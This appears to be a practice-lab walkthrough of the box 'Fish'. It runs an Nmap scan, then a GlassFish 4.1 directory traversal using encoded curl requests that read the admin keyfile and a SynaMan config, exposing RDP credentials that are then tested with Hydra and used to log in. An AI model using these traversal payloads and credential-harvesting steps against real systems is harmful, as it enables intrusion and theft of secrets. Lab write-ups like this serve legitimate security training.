Fish

Nmap

nmap 192.168.213.168 -sS -sV -p- -Pn

PORT     STATE SERVICE              VERSION
3389/tcp open  ms-wbt-server?
3700/tcp open  giop                 CORBA naming service
4848/tcp open  http                 Sun GlassFish Open Source Edition  4.1
6060/tcp open  x11?
7676/tcp open  java-message-service Java Message Service 301
7680/tcp open  pando-pub?
8080/tcp open  http                 Sun GlassFish Open Source Edition  4.1
8181/tcp open  ssl/http             Sun GlassFish Open Source Edition  4.1
8686/tcp open  sun-as-jmxrmi?

We start by using searchsploit to look for known vulnerabilities in the services Nmap identified.

searchsploit -w "GlassFish 4.1"

Looks like the version of GlassFish running is vulnerable to directory traversal. The exploit examples at the link below can be used to read known system files.

ExploitDB: https://www.exploit-db.com/exploits/39441

Using one of the examples from the link, with the correct IP and port, we can build a curl GET request to confirm the directory traversal.

curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini

After this I looked up configuration files for GlassFish to see if we can read any sensitive credential files. This StackOverflow link proved to be informative, and I was able to read the admin hash for GlassFish with a little bit of guesswork.

curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../glassfish4/glassfish/domains/domain1/config/admin-keyfileadmin

Unfortunately, however, I was unable to crack the hash and proceed with anything meaningful for now.

Looking through the rest of the open ports manually, we come across a page for "SynaMan", which we observe is running version 4.0.

Again, with searchsploit we check whether the running version is vulnerable.

searchsploit -w "SynaMan 4.0"

The SMTP disclosure entry is interesting to us:

ExploitDB: https://www.exploit-db.com/exploits/45387

We see from the description that, since we already have a directory traversal on the system, we can likely read the desired AppConfig.xml.

curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../SynaMan/config/AppConfig.xml

From the output we are able to piece together the following credentials:

arthur:KingOfAtlantis

Since RDP is open, a quick check with Hydra confirms the credentials are valid.

hydra -l "arthur" -p "KingOfAtlantis" rdp://<IP>

We can then connect via RDP to the target system.

xfreerdp /u:"arthur" /p:"KingOfAtlantis" +clipboard /v:<IP>

On the desktop we see a shortcut for the AV application TotalAV. Checking appwiz.cpl, we see that the installed version is 4.14.31.

searchsploit again shows a vulnerability for the installed version.

searchsploit -w "TotalAV 4.14.31"

This version of TotalAV appears to be vulnerable to privilege escalation.

ExploitDB: https://www.exploit-db.com/exploits/47897

YouTube: https://www.youtube.com/watch?v=88qeaLq98Gc
